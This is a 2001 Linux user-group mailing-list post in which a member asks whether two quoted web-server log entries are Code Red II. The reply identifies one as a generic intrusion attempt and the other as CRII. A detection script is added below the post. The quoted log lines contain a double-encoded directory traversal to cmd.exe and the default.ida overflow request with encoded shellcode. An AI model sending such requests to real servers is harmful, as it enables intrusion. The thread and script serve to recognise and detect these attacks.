[ale] Code Red 2

Jonathan Rickman jonathan at xcorps.net
Tue Aug 7 17:08:35 EDT 2001


On Tue, 7 Aug 2001, Michael Smith wrote:

> Here is what I think is an attempt by the second variant of the code
> red......
>
> Am I right?

sorta...

> 24.41.74.126 - - [06/Aug/2001:13:34:22 -0400] "GET
> /scripts/..%255c..%255cwinnt/
> system32/cmd.exe?/c+ping+-n+1+-l+128+-w+1+24.41.74.126 HTTP/1.0" 404 314 "-"
> "-"

not sure what this is, but it is definitely an intrusion attempt of sorts.

> 209.186.150.139 - - [06/Aug/2001:13:42:00 -0400] "GET
> /default.ida?XXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%
> u909
> 0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8
> b00%
> u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 285 "-" "-"
> 20

This is CRII.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net
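
An added example, not part of the original post: a small access-log triage script that flags the two request shapes quoted in this thread, the double-encoded `..%255c` traversal toward cmd.exe and the long-padded /default.ida request carrying %u-encoded data. The log lines are constructed (padding shortened, documentation-range addresses) and the name `classify` is hypothetical.

```python
import re
from urllib.parse import unquote

# Apache combined log format: ip, ident, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) '
)

# Constructed sample lines modelled on the two quoted entries, plus one benign hit.
SAMPLE = [
    '192.0.2.10 - - [06/Aug/2001:13:34:22 -0400] "GET '
    '/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-n+1 HTTP/1.0" 404 314 "-" "-"',
    '198.51.100.7 - - [06/Aug/2001:13:42:00 -0400] "GET /default.ida?'
    + "X" * 224 + '%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 285 "-" "-"',
    '203.0.113.5 - - [06/Aug/2001:13:50:11 -0400] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

def classify(line):
    """Return ip, status and findings for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    once = unquote(path)    # %255c -> %5c
    twice = unquote(once)   # %5c   -> backslash
    findings = []
    # A second decode that changes the path and exposes ../ or ..\ means the
    # traversal was hidden behind two layers of percent-encoding.
    if once != twice and re.search(r'\.\.[\\/]', twice):
        findings.append("double-encoded directory traversal")
    if twice.lower().endswith("cmd.exe"):
        findings.append("cmd.exe request")
    # .ida request whose query starts with 100+ copies of one pad character
    # and also carries %uXXXX-encoded words.
    pad = re.match(r'(.)\1{99,}', query)
    if path.lower().endswith(".ida") and pad and re.search(r'%u[0-9a-fA-F]{4}', query):
        findings.append("default.ida overflow pattern (pad=%r x%d)"
                        % (pad.group(1), len(pad.group(0))))
    return {"ip": m.group("ip"), "status": int(m.group("status")), "findings": findings}

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry))
```

The status field is kept in the result because both quoted requests were answered with 404.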
